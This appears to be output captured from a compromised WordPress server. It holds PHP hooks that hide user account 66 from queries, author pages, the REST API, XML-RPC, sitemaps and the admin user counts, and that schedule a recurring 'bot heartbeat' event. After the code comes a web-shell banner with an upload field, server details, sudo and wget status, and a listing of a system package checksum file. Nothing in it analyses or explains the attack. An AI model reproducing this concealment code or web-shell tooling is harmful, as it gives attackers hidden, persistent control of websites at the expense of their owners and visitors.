add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
f1d651643543c6be18c83424fcb251b5 usr/bin/locale-check 73a8cb03335e7dc1406ecf89f2e24b10 usr/lib/os-release 18f746c5c90ff506445f615ae44f5a7b usr/lib/systemd/system/motd-news.service 79b82d315319fdb55ccf0f2b4c83fe62 usr/lib/systemd/system/motd-news.timer cf277664b1771217d7006acdea006db1 usr/share/base-files/dot.bashrc d68ce7c7d7d2bb7d48aeb2f137b828e4 usr/share/base-files/dot.profile 6db82730e03aaeeecb8fee76b73d96d4 usr/share/base-files/dot.profile.md5sums e8217ac03d4101a8afb94cb0d82c4da4 usr/share/base-files/info.dir 9830e3dbb6a828f2cc824db8db0ceaf7 usr/share/base-files/motd 7028a4bd02c1d276aa45f0973b85fe1b usr/share/base-files/networks 9926b56bc6e576d4ad206dd82d38deff usr/share/base-files/profile 7146d00681e32d626ac96f70bd38e108 usr/share/base-files/profile.md5sums f3b332b9a376a0567236f54d7d87f85e usr/share/base-files/staff-group-for-usr-local 3b83ef96387f14655fc854ddc3c6bd57 usr/share/common-licenses/Apache-2.0 f921793d03cc6d63ec4b15e9be8fd3f8 usr/share/common-licenses/Artistic 3775480a712fc46a69647678acb234cb usr/share/common-licenses/BSD 65d3616852dbf7b1a6d4b53b00626032 usr/share/common-licenses/CC0-1.0 cfe2a5472d5eaa226eae091d4114ce29 usr/share/common-licenses/GFDL-1.2 a22d0be1ce2284b67950a4d1673dd1b0 usr/share/common-licenses/GFDL-1.3 5b122a36d0f6dc55279a0ebc69f3c60b usr/share/common-licenses/GPL-1 b234ee4d69f5fce4486a80fdaf4a4263 usr/share/common-licenses/GPL-2 1ebbd3e34237af26da5dc08a4e440464 usr/share/common-licenses/GPL-3 4cf66a4984120007c9881cc871cf49db usr/share/common-licenses/LGPL-2 4fbd65380cdd255951079008b364516c usr/share/common-licenses/LGPL-2.1 3000208d539ec061b899bce1d9ce9404 usr/share/common-licenses/LGPL-3 0c5913925d40b124fb52ce84c5deb3f3 usr/share/common-licenses/MPL-1.1 815ca599c9df247a0c7f619bab123dad usr/share/common-licenses/MPL-2.0 af032ddc1821dfc3eb1dbb5883910119 usr/share/doc/base-files/README fbd937e067f0a83fb9422713a6b84a8a usr/share/doc/base-files/README.FHS ab7f45c34f363b3a2a3bf5516f105eaf usr/share/doc/base-files/changelog.gz 1b8bb96d42614948cb7de2882e191734 usr/share/doc/base-files/copyright cf277664b1771217d7006acdea006db1 usr/share/dot.bashrc d68ce7c7d7d2bb7d48aeb2f137b828e4 usr/share/dot.profile 6db82730e03aaeeecb8fee76b73d96d4 usr/share/dot.profile.md5sums e8217ac03d4101a8afb94cb0d82c4da4 usr/share/info.dir ce3e5af45c45cfb4b8ffcc5e13640dcc usr/share/lintian/overrides/base-files 12a03b0f1ef4feaebe5f9bbfc1e1e6c3 usr/share/motd 7028a4bd02c1d276aa45f0973b85fe1b usr/share/networks 9903891b0564b3a7483682c47a49b687 usr/share/pixmaps/ubuntu-logo-text-dark.png 28b5fd1db57c563a2fef20e74fd42007 usr/share/pixmaps/ubuntu-logo-text.png 9b711c1c45d9fc5a86b981c02caff072 usr/share/pixmaps/ubuntu-logo.svg 9926b56bc6e576d4ad206dd82d38deff usr/share/profile 7146d00681e32d626ac96f70bd38e108 usr/share/profile.md5sums f3b332b9a376a0567236f54d7d87f85e usr/share/staff-group-for-usr-local